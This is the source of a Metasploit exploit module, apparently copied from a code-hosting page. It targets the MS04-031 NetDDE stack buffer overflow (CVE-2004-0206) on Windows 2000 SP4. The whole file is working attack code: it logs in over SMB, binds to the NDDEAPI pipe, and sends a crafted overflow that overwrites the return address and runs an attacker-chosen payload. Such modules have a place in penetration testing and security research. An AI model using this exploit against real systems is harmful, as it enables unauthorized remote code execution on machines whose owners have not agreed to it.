Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::DCERPC
10
  include Msf::Exploit::Remote::SMB::Client
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'MS04-031 Microsoft NetDDE Service Overflow',
15
      'Description'    => %q{
16
          This module exploits a stack buffer overflow in the NetDDE service, which is the
17
        precursor to the DCOM interface.  This exploit effects only operating systems
18
        released prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim
19
        that this vulnerability can be exploited without authentication, the NDDEAPI
20
        pipe is only accessible after successful authentication.
21
      },
22
      'Author'         => [ 'pusscat' ],
23
      'License'        => BSD_LICENSE,
24
      'References'     =>
25
        [
26
          [ 'CVE', '2004-0206'],
27
          [ 'OSVDB', '10689'],
28
          [ 'BID', '11372'],
29
          [ 'MSB', 'MS04-031'],
30

31
        ],
32
      'Privileged'     => true,
33
      'DefaultOptions' =>
34
        {
35
          'EXITFUNC' => 'thread'
36
        },
37
      'Payload'        =>
38
        {
39
          'Space'    => (0x600 - (133*4) - 4),
40
          'BadChars' => "\\/.:$\x00",       # \ / . : $ NULL
41
          'Prepend'  => 'A' * 8,
42
        },
43
      'Platform'       => 'win',
44
      'Targets'        =>
45
        [
46
          [ 'Windows 2000 SP4', { 'Ret' => 0x77e56f43 } ],  # push esp, ret :)
47
        ],
48
      'DefaultTarget'  => 0,
49
      'DisclosureDate' => '2004-10-12'))
50

51
    register_options(
52
      [
53
        OptString.new('SMBPIPE', [ true,  "The pipe name to use (nddeapi)", 'nddeapi']),
54
      ])
55
  end
56

57
  def exploit
58
    connect()
59
    smb_login()
60
    print_status("Trying target #{target.name}...")
61

62
    handle = dcerpc_handle('2f5f3220-c126-1076-b549-074d078619da', '1.2', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
63
    print_status("Binding to #{handle}")
64
    dcerpc_bind(handle)
65
    print_status("Bound to #{handle}")
66

67
    retOverWrite =
68
      'AA' + (NDR.long(target.ret) * 133) + payload.encoded
69

70
    overflowChunk =
71
      retOverWrite +
72
      NDR.long(0xCA7CA7) + # Mew. 3 bytes enter. 1 byte null.
73
      NDR.long(0x0)
74

75
    stubdata =
76
      NDR.UnicodeConformantVaryingStringPreBuilt(overflowChunk) +
77
      NDR.long(rand(0xFFFFFFFF))
78

79
    print_status('Calling the vulnerable function...')
80

81
    begin
82
      response = dcerpc.call(0xc, stubdata)
83
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
84
    end
85

86
    handler
87
    disconnect
88
  end
89
end
90

91